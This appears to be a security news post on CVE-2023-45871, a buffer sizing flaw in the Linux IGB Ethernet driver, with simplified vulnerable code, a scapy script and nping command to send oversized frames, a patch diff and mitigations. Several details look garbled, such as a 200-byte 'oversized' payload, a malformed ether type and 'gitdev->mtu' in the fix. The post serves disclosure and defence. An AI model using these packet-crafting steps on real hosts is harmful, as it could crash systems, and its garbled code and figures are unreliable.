CVE CyberSecurity Database News

CVE-2023-45871 - Critical Buffer Size Issue in Intel IGB Driver for Linux (with Exploit Details & Code)

Poster -

In late 2023, security researchers uncovered a dangerous vulnerability in the IGB Ethernet driver for Linux (drivers/net/ethernet/intel/igb/igb_main.c), marked as CVE-2023-45871. This flaw allows for the potential of buffer overflows, especially when handling unexpectedly large network frames. It impacts Linux kernel versions prior to 6.5.3 and can lead to crashes or even arbitrary code execution under certain situations.

This detailed post will break down the mechanics of the bug in simple language, show example code, and discuss exploitation routes, with links to official sources.

What is the IGB Driver?

The IGB driver is responsible for managing Intel(R) Gigabit Ethernet adapters under Linux, allowing the system to communicate over wired networks reliably.

Vulnerable Component

- File: drivers/net/ethernet/intel/igb/igb_main.c

Description

The bug comes down to improper buffer sizing when receiving Ethernet frames that are larger than the defined *Maximum Transmission Unit* (MTU). Under some networking circumstances—like VLAN stacking or custom large frames—packets larger than expected slip through. Because the IGB driver doesn't sufficiently check or resize its memory buffer, a *buffer overflow* may occur.

Summary

> "The IGB driver does not allocate enough memory for packets larger than the MTU, which can cause buffer overflows, memory corruption, crashes, or potentially allow attackers to execute malicious code."

Let's look at the relevant vulnerable code (simplified for explanation)

// In igb_main.c prior to kernel 6.5.3
#define IGB_RX_BUFFER_LEN     (ETH_FRAME_LEN + ETH_FCS_LEN)

struct sk_buff *skb = netdev_alloc_skb_ip_align(dev, IGB_RX_BUFFER_LEN);
if (!skb) {
    // handle error
}
memcpy(skb_put(skb, len), buff, len);

How Might an Attacker Use This?

- Local Network: Attacker crafts special Ethernet packets slightly above the normal MTU, possibly with extra headers or padding.

Generating an Oversized Frame

You can use tools like scapy (Python) or pktgen to generate frames.

from scapy.all import Ether, sendp, Raw

# Adjust iface to your target interface name
iface = "eth"
oversized_payload = "A" * 200  # Larger than normal MTU (e.g., 150)
packet = Ether() / Raw(load=oversized_payload)

# Send the crafted packet
sendp(packet, iface=iface, count=1)

With Linux Command-Line

sudo nping --ether-type x080 --data-length 200 --interface eth 192.168.1.2

> *Note: These will only work if the hardware & driver allow receipt of frames above the configured MTU.*

Rejecting over-sized frames properly.

Relevant Commit:
Upstream fix for IGB driver buffer sizing

- #define IGB_RX_BUFFER_LEN     (ETH_FRAME_LEN + ETH_FCS_LEN)
+ #define IGB_RX_BUFFER_LEN     (max(gitdev->mtu, ETH_FRAME_LEN) + ETH_FCS_LEN)

References

- NVD: CVE-2023-45871
- Kernel Patch: igb: fix buffer size calculation for RX frames
- Linux IGB Driver Source: igb_main.c

Limit MTU sizes if you cannot upgrade immediately.

- Filter unknown/oversized frames in the switch or host firewall.

Conclusion

CVE-2023-45871 serves as a reminder that even mature drivers can introduce kernel-level bugs with serious consequences. If your systems use Intel Gigabit adapters, update your Linux kernels promptly. Always restrict access to trusted networks and monitor for unusual traffic, especially in environments running older kernels.

Timeline

Published on: 10/15/2023 01:15:09 UTC
Last modified on: 11/10/2023 18:15:08 UTC